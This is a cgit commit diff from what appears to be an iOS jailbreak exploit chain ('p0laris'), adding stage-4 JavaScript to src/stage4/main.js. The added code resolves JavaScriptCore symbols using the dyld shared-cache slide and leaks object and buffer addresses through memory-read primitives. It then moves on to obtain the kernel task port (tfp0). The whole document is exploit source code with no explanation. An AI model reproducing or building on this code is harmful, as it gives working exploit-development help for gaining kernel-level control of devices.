summaryrefslogtreecommitdiff
path: root/src/stage4/main.js
diff options
context:
space:
mode:
Diffstat (limited to 'src/stage4/main.js')
-rw-r--r--src/stage4/main.js14
1 files changed, 14 insertions, 0 deletions
diff --git a/src/stage4/main.js b/src/stage4/main.js
index 53a74ec..af2ed69 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -12,6 +12,13 @@ var SOCK_DGRAM = 2;
var SOCK_DGRAM = 2;
var IPPROTO_UDP = 17;
+function prep_shit() {
+ string_ref = scall("JSStringCreateWithUTF8CString", "victim");
+ global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
+ jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
+ large_buf_ptr = leak_vec(large_buf);
+}
+
function main() {
syslog(LOG_SYSLOG, "__p0laris_LOG_START__");
p0laris_log("[*] we out here");
@@ -24,6 +31,13 @@ function main() {
printf("test");
+ var dyld_shc_slide = get_dyld_shc_slide();
+
+ sym_cache["JSStringCreateWithUTF8CString"] = JSStringCreateWithUTF8CString + dyld_shc_slide;
+ sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide;
+ sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
+ prep_shit();
+
var tfp0 = get_kernel_task();
syslog(LOG_SYSLOG, "__p0laris_LOG_END__");
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 20:04:34 +0000